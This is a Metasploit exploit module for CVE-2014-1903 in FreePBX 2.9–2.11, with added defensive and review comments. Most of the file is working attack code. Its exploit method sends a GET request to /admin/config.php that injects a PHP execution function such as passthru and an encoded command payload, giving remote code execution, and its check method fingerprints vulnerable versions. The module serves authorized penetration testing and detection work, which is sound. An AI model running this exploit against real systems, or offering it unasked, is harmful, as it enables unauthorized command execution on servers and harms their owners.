rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/freepbx_config_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2014-1903 in FreePBX.
#
# According to the module description, FreePBX 2.9, 2.10 and 2.11 accept a PHP
# function name and its arguments through the "function" and "args" parameters
# of /admin/config.php. The module issues one GET request to that script with
# handler=api; `check` only reads /admin/CHANGES and sends no payload.
#
# Defensive notes:
# - Both requests are plain GETs, so the parameters travel in the query
#   string; access-log entries for /admin/config.php carrying handler=api
#   together with function= and args= are the trace to search for.
# - Remediation is the vendor fix tracked in the FREEPBX-7123 reference below;
#   keeping the /admin interface off untrusted networks limits exposure.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its two string options.
  #
  # @param info [Hash] caller-supplied metadata merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => "FreePBX config.php Remote Code Execution",
      'Description' => %q{
        This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
        It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
        parameters "function" and "args".
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'i-Hmx', # Vulnerability discovery
        '0x00string', # PoC
        'xistence <xistence[at]0x90.nl>' # Metasploit module
      ],
      'References' => [
        ['CVE', '2014-1903'],
        ['OSVDB', '103240'],
        ['EDB', '32214'],
        ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
      ],
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [
        ['FreePBX', {}]
      ],
      'Privileged' => false,
      'DisclosureDate' => '2014-03-21',
      'DefaultTarget' => 0,
      # NOTE(review): reliability, stability and side effects are all recorded
      # as unknown, so the module's impact on a target has not been assessed.
      # Presumably the query string (command included) lands in the web server
      # access log -- confirm before filling in SideEffects.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    }
    super(update_info(info, module_info))

    base_path_opt = OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])
    register_options([base_path_opt])

    php_func_opt = OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])
    register_advanced_options([php_func_opt])
  end

  # Fingerprints the installation from the first line of /admin/CHANGES.
  #
  # No payload is sent; the verdict rests only on the version string.
  #
  # @return [Exploit::CheckCode] Unknown when the file cannot be fetched with
  #   a 200, Appears when the first line matches the version pattern, Safe
  #   otherwise
  def check
    vprint_status("Trying to detect installed version")

    changes_request = {
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")
    }
    res = send_request_cgi(changes_request)

    # presumably the first line of CHANGES names the installed release -- confirm
    first_line_found = res && res.code == 200 && res.body =~ /^(.*)$/
    return Exploit::CheckCode::Unknown unless first_line_found

    version = Regexp.last_match(1)
    vprint_status("Version #{version} detected")

    # NOTE(review): the pattern is unanchored and requires a literal ".0"
    # patch component, so it can match inside a longer version string and it
    # reports Safe for any other patch level of the releases named in the
    # description. Do not treat a Safe verdict as proof that a host is patched.
    version =~ /2\.(9|10|11)\.0/ ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  # Sends the single GET request to /admin/config.php that carries the
  # configured PHP function name and the encoded command payload.
  #
  # Only a non-200 answer is reported as a failure; a missing response
  # produces no message.
  def exploit
    # Random lowercase value (5 to 14 characters) for the "display" parameter.
    display_value = rand_text_alpha_lower(rand(10) + 5)

    print_status("Sending payload")
    query = {
      "display" => display_value,
      "handler" => "api",
      "function" => datastore['PHPFUNC'],
      "args" => payload.encoded
    }
    config_request = {
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "admin", "config.php"),
      'vars_get' => query
    }
    response = send_request_cgi(config_request)

    # A status other than 200 suggests the request was not processed as
    # intended, so a shell is unlikely either.
    print_error("Unexpected response, exploit probably failed!") if response && response.code != 200
  end
end